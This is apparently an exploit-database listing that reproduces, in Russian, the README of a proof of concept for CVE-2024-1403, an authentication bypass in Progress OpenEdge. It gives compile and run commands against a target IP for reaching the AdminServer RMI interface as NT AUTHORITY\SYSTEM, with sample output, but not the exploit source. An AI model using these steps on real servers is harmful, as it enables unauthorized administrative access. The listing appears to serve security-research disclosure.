Sploitus

Exploit for CVE-2024-1403

kitploit · 2026-09-05

Exploit Code

MARKDOWN72 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HORIZON3AI-CVE-2024-1403
# CVE-2024-1403 Обход аутентификации Progress OpenEdge

Эксплойт, proof of concept, для Progress OpenEdge CVE-2024-1403.

## Сообщение в блоге

Подробнее здесь: https://www.horizon3.ai/attack-research/cve-2024-1403-progress-openedge-authentication-bypass-deep-dive

## Использование

Вы должны предоставить собственные версии следующих jar-файлов:

  * `progress.jar`
  * `oeauth-12.8.-.jar`
  * `osmetrics.jar`
  * `juniper.jar`



### Компиляция

root@kitploit:~
    
    
    $ javac -cp progress.jar:oeauth-12.8.0.jar Main.java
    
    

### Использование

Запуск этого скрипта попытается подключиться к интерфейсу RMI `AdminServer`, используя учётные данные `NT AUTHORITY\SYSTEM`.

root@kitploit:~
    
    
    $ java -cp progress.jar:oeauth-12.8.0.jar:osmetrics.jar:juniper.jar:. Main <target_ip>
    com.progress.system.SystemPlugIn
    	com.progress.chimera.common.IChimeraRemoteObject
    	com.progress.system.ISystemPlugIn
    
    com.progress.agent.database.AgentPlugIn
    	com.progress.chimera.common.IChimeraRemoteObject
    	com.progress.agent.database.IAgentPlugIn
    
    com.progress.ubroker.tools.NSRemoteObject
    	com.progress.chimera.common.IChimeraHierarchy
    	com.progress.ubroker.tools.IYodaRMI
    	com.progress.ubroker.tools.IYodaSharedResources
    
    com.progress.ubroker.tools.UBRemoteCommand
    	com.progress.chimera.common.IChimeraRemoteCommand
    
    com.progress.juniper.admin.JAPlugIn
    	com.progress.chimera.common.IChimeraRemoteObject
    	com.progress.juniper.admin.IJAPlugIn
    
    com.progress.agent.smdatabase.SMPlugIn
    	com.progress.chimera.common.IChimeraRemoteObject
    

## Следите за командой Horizon3.ai Attack в Twitter, чтобы быть в курсе последних исследований в области безопасности:

  * Horizon3 Attack Team
  * James Horseman
  * Zach Hanley



## Отказ от ответственности

Данное программное обеспечение создано исключительно для академических исследований и разработки эффективных методов защиты и не предназначено для использования при атаках на системы, за исключением случаев явного разрешения. Сопровождающие проекта не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.